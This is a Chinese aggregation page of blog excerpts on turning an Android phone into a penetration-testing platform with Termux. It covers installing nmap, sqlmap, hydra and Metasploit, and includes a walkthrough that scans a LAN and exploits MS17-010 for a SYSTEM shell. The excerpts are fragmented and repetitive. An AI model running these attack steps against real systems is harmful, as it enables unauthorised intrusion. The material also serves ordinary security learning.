精华内容
下载资源
问答
  • termux渗透
    万次阅读 多人点赞
    2020-03-05 13:29:04

    注意:这些工具的安装最好在root或proot环境下
    1.安装metasploit
    Termux官方提供的自动话脚本安装方法如下:

    cd ~ 
    pkg install wget 
    wget https://Auxilus.github.io/metasploit.sh 
    bash metasploit.sh
    

    这个过程平均耗时大约3分钟左右(使用国内的清华源的情况下)。
    在这里插入图片描述
    成功安装。

    安装成功之后,启动postgresql

    pg_ctl -D /data/data/com.termux/files/usr/var/lib/postgresql -l logfile start
     cd metasploit-framework/
     ./msfconsole    
    

    在这里插入图片描述
    成功运行msf。

    <
    更多相关内容
  • 本文作者:D0m4nce(信安之路首次投稿作者)学习信息安全有一段时间了,之前在信安之路看到过关于树莓派和 badusb 的文章,不过一直没有尝试。...作为安全小白也想跟大家一起交流)Termux 简介Termux是一个And...

    本文作者:D0m4nce(信安之路首次投稿作者)

    学习信息安全有一段时间了,之前在信安之路看到过关于树莓派和 badusb 的文章,不过一直没有尝试。前几天偶然看到termux这个 app,于是想尝试看能不能作为替代品使用。

    (我知道很多大表哥已经试过了,所以我就记录一下自己遇到的问题还有解决办法,希望表哥们不要嫌弃。作为安全小白也想跟大家一起交流)

    Termux 简介

    Termux是一个Android下一个高级的终端模拟器,开源且不需要root,支持apt管理软件包,十分方便安装软件包,完美支持Python,PHP,Ruby,Go,Nodejs,MySQL等。(推荐从 Google Play 下载)

    关于 termux 的介绍网上有很多,所以我就不太多说。主要说一下自己实际操作中需要使用的。

    长按菜单

    通过长按屏幕出现的菜单可以实现复制粘贴等多种操作

    98ab266993b7d16525eeddb83d4a601c.png

    ab18cdc6ae1205b1eb6fa03040928269.png

    导航栏

    62157e557d38a6e51c9c6d4630825479.png

    在屏幕从左向右滑动会出现一个导航栏,可以切换重命名会话等。长按最下面的 keyboard 可以调出扩展功能键(就是下面的 esc 等案件)

    音量键的使用

    音量键的相当于ctrl,相信大家对命令行下ctrl+UKLZ等操作已经烂熟于心我就不多写了

    音量的是比较特殊的按键。我用到的方法如下:

    bc19a372e1e3a67bdc7aa67816837589.png

    pkg 的使用

    termux 封装了 pkg 并且向下兼容 apt,常用的参数有以下几种

    048751656aa228dd637ada03ab105a6f.png

    开始办事

    第一步:更新源

    export EDITOR=vi #设置默认编辑器apt edit-sources #编辑源文件deb [arch=all,aarch64] deb http://mirrors.tuna.tsinghua.edu.cn/termux stable main #把这行内容写入,并且注释掉原先的源pkg up #更新源

    看了很多教程里只说参考清华镜像源或者直接把deb http://mirrors.tuna.tsinghua.edu.cn/termux添加进去。

    实际上前面的[arch=all,aarch64]

    也必须写入。后面的aarch64是手机的平台架构,这个位置默认是arm,所以一定要写。大家可以通过uname -m查看自己的架构。

    283811e840829b84c56225ff0ba8287e.png

    修改后是这个样子

    823eba63217f2dda63d21b54b3a32fd9.png

    这一步顺利结束后面就基本不会有任何问题了。如果pkg up报错可以检查一下自己的步骤,确认真的没有错误的话,就换一下网络。网络原因有时候会影响更新。我用wifi更新的时候就没有报错。后来用流量更新就报错了。

    第二步:优化

    上面的截图都是我安装过界面优化之后的样子,原始界面看起来没有这么舒服。

    我们通过oh-my-zsh来代替默认的 shell。首先需要安装curl,最好也安上gitwget

    pkg install curl

    pkg install git

    pkg install wget

    然后通过下面的命令下载并执行优化脚本

    sh -c "$(curl -fsSL https://github.com/Cabbagec/termux-ohmyzsh/raw/master/install.sh)"

    脚本会让我们选择背景色和字体,我的字体和颜色是 14,6,大家可以自己换一换试试。

    Enter a number, leave blank to not to change: 14

    Enter a number, leave blank to not to change: 6

    脚本结束重启就会生效啦,如果想重新选择可以执行

    $ ~/termux-ohmyzsh/install.sh

    (修改oh-my-zsh的配色还有修改启动语我都没有尝试,有兴趣的表哥表姐们可以移步国光的博客, Termux 高级终端安装使用配置教程:

    https://www.sqlsec.com/2018/05/termux.html

    第三步:安装工具

    Nmap

    apt install nmap

    Sqlmap

    需要先安装 python

    pkg install python

    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

    whatportis

    pip install whatportis

    hydra

    apt install hydra

    metasploit

    网上很多教程,不过还是官方的最好用。安装过程有点久,最好保持网络环境,不然就很容易报错。

    pkg install unstable-repo

    pkg install metasploit

    附上运行截图

    6f88dacfbdb3a5072e53da12c99e8c84.png

    lazymux(工具下载器)

    github地址:

    https://github.com/Gameye98/Lazymux

    介绍是这样写的

    Lazymux tools installer is very easy to use, only provided for lazy termux users.

    安装需要 py2 的环境,里面提供了多种工具的下载,我就不一一介绍了,各位各取所需

    pkg install python2

    git clone https://github.com/Gameye98/Lazymux.git

    33d15ad0a10c93cd160cd0894ddee565.png

    5695f9f0030d5eb73428573c1b640cb5.png

    第四步:安装 kali(可选)

    kalinethunter 我接触比较少,所以只尝试了一下安装,有需要的表哥表姐们 可以安装一下。

    wget https://raw.githubusercontent.com/Hax4us/Nethunter-In-Termux/master/kalinethunterchmod +x kalinethunterbash kalinethunter

    安装成功后startkali即可启动,如果安装过程报错可以根据脚本提示信息排错。网络问题直接重新运行即可。

    启动后还需要在 kali 里面执行下面的命令才能正常使用。

    apt-key adv --keyserver hkp://keys.gnupg.net --recv-keys 7D8D0BF6wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.debapt --fix-broken installdpkg -i ./kali-archive-keyring_2018.1_all.deb

    在这之后大家可以apt-get update等等。

    25af80797da9f49e815dde42dba31650.png

    除此之外还有另一种通过atilo进行安装的方法,不过要注意选择 CN 版本才能正常安装。感兴趣的老哥们自己研究一下也很简单。

    关于权限

    没有 root 的手机是没有 root 权限的。不过 termux 给我们提供了一个解决办法可以模拟 root 权限。

    我们下载安装 proot

    pkg install proot

    然后执行下面的命令即可获得 root 权限

    termux-chroot

    root 时输入exit可以退回普通用户。

    事后

    现在我们已经成功通过 Termux 打造了个人比较简单的渗透平台,之后的操作大家都懂。

    本人作为小萌新第一次发言有点紧张(虽然不是什么技术文章)

    写的不对或者不好的地方还请大家多多指教。

    谢谢大家读到最后?

    dbace712acc96243b65ea703dc1e2ba9.png

    展开全文
  • 渗透测试|利用手机攻击电脑(Termux终端初体验)

    千次阅读 多人点赞 2020-11-23 18:37:27
    至少我们曾经在一起过。来自:一言介绍Termux是一个Android下一个高级的终端模拟器,开源且不需要root,支持apt管理软件包,十分方便安装软件包,完美支持Python,PHP,Ruby,Go,Nodejs,MySQL等...前言Termux终端安装在安...

    至少我们曾经在一起过。

    来自:一言

    介绍

    Termux是一个Android下一个高级的终端模拟器,开源且不需要root,支持apt管理软件包,十分方便安装软件包,完美支持Python,PHP,Ruby,Go,Nodejs,MySQL等。随着智能设备的普及和性能的不断提升,如今的手机、平板等的硬件标准已达到了初级桌面计算机的硬件标准,用心去打造完全可以把手机变成一个强大的工具.

    20200323_013338_75.png

    前言

    Termux终端安装在安卓手机上,就相当于是一个便携式服务器,可以下载Metasploit,Nmap,Sqlmap,hydra等渗透测试工具,可以走到哪儿扫到哪儿,舒服就完事了[aru_23],等于一个移动kali。

    环境模拟

    当你拿着手机连上一个wifi,通过扫描发现局域网内存在一台在线的电脑,并且存在漏洞,所以需要进行一些简单的扫描渗透测试,所以就要利用到Termux来实现,拿到目标权限。[aru_32]

    安卓手机ip:192.168.2.100

    目标主机ip:未知

    测试开始

    1.先使用nmap扫描局域网内存活的主机。

    nmap -sP 192.168.2.0/24

    20200323_024747_47.jpg

    温馨提示

    通过扫描可以知道,IP:192.168.2.1 是路由器地址,IP:192.168.2.100 是我们手机地址,IP:192.168.2.106 是目标地址

    2.探测目标主机详细信息,可以用-A

    nmap -A 192.168.2.106

    20200323_024806_50.jpg

    温馨提示

    通过nmap扫描可以知道目标主机是win2008系统(ps:没有win7的镜像~就用这个演示一下[aru_15]),并且开启了smb服务,所以我们可以试试扫描目标主机是否存在ms17-010漏洞

    3.利用Metasploit扫描目标是否存在漏洞

    msfconsole #进入Metasploit

    search ms17-010 #搜索漏洞

    use auxiliary/scanner/smb/smb_ms17-010 #使用ms17-010扫描服务

    set rhost 192.168.2.106 #设置目标地址

    run #执行

    20200323_024841_32.jpg

    经过扫描,目标存在ms17-010漏洞,接下来就可以直接利用漏洞反弹shell了

    4.反弹shell

    use exploit/windows/smb/ms17_010_eternalblue #使用该漏洞

    set rhost 192.168.2.106 #设置目标

    run #执行

    20200323_024904_18.jpg

    温馨提示

    这里就攻击成功,直接反弹shell了,并且权限为system权限。[aru_15]

    总结

    又水了一篇文章~这个教程就是简单的演示一下如何用手机使用Metasploit等工具进行渗透测试,并且还可以使用sqlmap,走到哪儿注入到哪儿[aru_17]

    展开全文
  • Termux安装--不需要ROOT打造安卓渗透手机

    万次阅读 多人点赞 2019-08-18 21:47:50
    前言 Termux是运行在Android终端上的linux...可以用它来搭建渗透环境,安装nmap、sqlmap、metasploit、hydra等工具。 Termux安装 直接在Android应用商店进行下载,或者github进行下载Termux下载 下载只有145k,...

    前言

    Termux是运行在Android终端上的linux模拟器。不需要root,支持apt管理软件包,可安装python、ruby、go、mysql等各种坏境。
    可以用它来搭建渗透环境,安装nmap、sqlmap、metasploit、hydra等工具。

    Termux安装

    直接在Android应用商店进行下载,或者github进行下载Termux下载
    下载只有145k,简直神器。

    image.png

    Termux使用

    长按屏幕,显示菜单栏。
    从左往右滑动,显示隐藏导航栏,可以新建、重命名会话session

    快捷键

    音量减键模拟Ctrl键

    音量减键+C----中止当前进程
    音量减键+D----注销终端会话
    音量减键+L----清除终端
    音量减键+E----光标移动到行尾
    

    音量加键作为特殊键

    音量加键+E----Esc键
    音量加键+T----Tab键
    音量加键+W----向上箭头
    音量加键+A----向左箭头
    音量加键+S----向下箭头
    音量加键+D----向右箭头
    音量加键+P----上一页
    音量加键+N----下一页
    

    基本命令

    Termux除了支持apt命令,还有pkg命令,向下兼容apt命令。

    pkg search             搜索包
    pkg install            安装包
    pkg uninstall          卸载包
    pkg reinstall          重新安装包
    pkg update             更新源
    pkg upgrade            升级软件包
    

    修改源

    修改源为清华源,命令

    vi  $PREFIX/etc/apt/sources.list
    

    将原来的https://termux.net官方源替换为http://mirrors.tuna.tsinghua.edu.cn/termux

    image.png

    修改源地址后,进行更新、升级并安装基本工具

    pkg update && pkg upgrade
    pkg install vim curl wget git unzip unrar tar
    

    ssh连接Android Termux

    为了更方便操作一些指令,需要ssh连接Termux
    先在Termux安装并开启ssh服务

    apt install openssh 
    sshd 
    

    注意默认ssh默认监听8022端口

    image.png

    选择kali作为PC端。在kali上生成秘钥。

    ssh-keygen -t rsa 
    

    执行后,会生成三个文件id_rsa, id_rsa.pub , known_hosts

    image.png

    将公钥id_rsa.pub拷贝到手机。方法有许多。
    选择用Termux ssh到kali直接进行拷贝

    ssh user@linux "cat ~/.ssh/id_rsa.pub" >> ~/.ssh/authorized_keys
    

    user为用户名,linux为kali的IP地址。

    image.png

    然后在客户端(kali)上ssh连接即可。

    ssh -p8022 user@Termux
    
    image.png

    nice!!!

    Termux优化

    配置颜色

    sh -c "$(curl -fsSL https://github.com/Cabbagec/termux-ohmyzsh/raw/master/install.sh)"  
    

    分别选择背景色和字体

    Enter a number, leave blank to not to change: 14 
    Enter a number, leave blank to not to change: 5
    
    image.png

    重启Termux后

    image.png

    安装渗透工具

    安装一些知名的渗透工具。

    安装nmap

    apt install nmap
    
    image.png

    安装metasploit

    pkg install proot  
    

    termux-chroot进入模拟的 root 环境,来尝试安装metasploit

    wget https://Auxilus.github.io/metasploit.sh
    bash metasploit.sh
    

    安装时间内较长,发现报警

    image.png

    解决方法:https://www.jianshu.com/p/536d4676f992
    切换至metasploit-framework目录下,运行命令

    bundle config build.nokogiri --use-system-libraries && bundle install
    
    image.png

    再次安装启动,依然error,没有gem install backports -v 3.11.4

    image.png

    解决:

    gem  install backports -v 3.11.4
    

    终于success安装启动。但metasploit 启动后没有连接Postgresql数据库

    image.png

    解决命令

    pg_ctl -D $PREFIX/var/lib/postgresql start
    
    image.png
    image.png

    安装sqlmap

    termux下直接安装python默认是python3.5版本。安装sqlmap需要指定python2版本

    apt install python2 
    git clone https://github.com/sqlmapproject/sqlmap.git
    

    切换至sqlmap目录,运行

    python2 sqlmap.py
    
    image.png

    除此之外,还可以安装hydra、subDomainsBrute、RouterSploit等

    参考资料
    Termux 高级终端安装使用配置教程
    基于Termux打造Android手机渗透神器

    展开全文
  • 0x00前言Termux是一款开源且不需要root,运行在Android终端上极其强大的linux模拟器,支持apt管理软件包,完美支持python,ruby,go,nodejs。本文使用termux搭建Nmap、Sqlmap、BBScan、subDomainsBrute、Hydra、...
  • 用手机kali不是太方便(懒得捣鼓),所以另找道路,用手机作渗透测试。   1.下载一个Termux,可以不用给ROOT权限。 2.打开之后输入以下命令安装必要环境。 apt update apt install python2 //谨记,...
  • 前言Termux是运行在Android...可以用它来搭建渗透环境,安装nmap、sqlmap、metasploit、hydra等工具。Termux安装直接在Android应用商店进行下载,或者github进行下载Termux下载下载只有145k,简直神器。Termux使用...
  • 1、要在手机上安装cpolar,首先需要安装一款终端模拟APP,这里我们选择的是Termux(好处是可不必root直接启动),并且自动安装最小化的Linux系统,支持apt管理软件包,能够完美支持python、ruby、go、nodejs。...
  • 利用手机作为渗透工具的一些思路

    千次阅读 多人点赞 2022-03-02 18:37:53
    前言: 一直有捣鼓手机渗透的想法 手机渗透的好处在我看来就是:便于携带,便于隐藏攻击 毕竟近缘渗透的话 使用电脑的话 太容易暴露了 研究了下最近几年常见的一些app和思路 像以前的zanti和dsploit这些现在真的算是...
  • termux ngrok 内网穿透

    千次阅读 热门讨论 2021-03-26 22:05:00
    termux ngrok 内网穿透 教程
  • termux内网穿透-ngrok

    千次阅读 2022-02-23 11:12:46
    最后运行ngrok 注意在运行ngrok之前需要运行:termux-chroot pkg install proot termux-chroot ngrok http 8080  我这里用的是默认8080端口, 好了 搞定 要是没有运行termux-chroot 报错如图类似错误
  • Termux使用教程

    千次阅读 2020-01-26 12:41:24
    0x01 Termux简介及安装 Termux是高级安卓Linux终端,提供几乎接近原生的Linux命令行体验,包括top/vim等界面独占程序也能流畅运行。 官方库中有openssh/gcc/make/git等等众多常用软件库,可以直接使用apt install...
  • termux从入门到入坑

    万次阅读 多人点赞 2018-10-26 10:36:14
    termux可以利用PROOT出一个Linux操作系统,PROOT是无需根的。但是随之而来很多问题 1.kali大部分工具不知道如何安装比如msf,以为apt install metasploit就行了 2.不会使用PKG,termux中PKG和易于其实差不多.........
  • termux 0.118

    2022-05-03 17:51:19
    可以使用 Termux 安装 python,并实现 python 编程,可以用手机架设 Server,同样可以用于渗透测试等等。 Termux 是一个 Android 下一个高级的终端模拟器,开源且不需要 root,支持 apt 管理软件包,十分方便安装...
  • Python调用摄像头

    千次阅读 2020-11-24 12:28:23
    一、打开摄像头import cv2import numpy as npdef video_demo():capture = cv2.VideoCapture(0)#0为电脑内置摄像头while(True):ret, frame = capture.read()#摄像头读取,ret为是否成功打开摄像头,true,false。...
  • 用手机渗透路由器

    千次阅读 多人点赞 2017-11-03 04:21:39
    如果你想在电脑上运行,可以阅读这篇文章,而这篇教程则会告诉你如何轻松地在未Root的安卓设备上安装RouterSploit,这样一来,只要你的智能手机可以连接这些有漏洞的路由器,你就可以渗透他们。 RouterSploi
  • Termux结合公网kali打造移动渗透神器

    千次阅读 2018-08-01 23:01:00
    Termux结合公网kali打造移动渗透神器 --lionhoo 适读人群:像我一样的萌新!!! 先介绍一下TermuxTermux是一款开源且不需要root,运行在Android终端上极其强大的linux模拟器,支持apt管理软件包,完美支持...
  • 相比Linux kail来说,我觉得Termux更方便喜欢渗透的朋友来玩,因为之前的时候很苦恼,电脑随身拿实在是太不方便了,后面我做U盘 KAIL,这个不建议用2.0的U盘做,比较适用于3.0读取文件速度快,才不会那么卡。...

空空如也

空空如也

1 2 3 4 5 ... 8
收藏数 146
精华内容 58
关键字:

termux渗透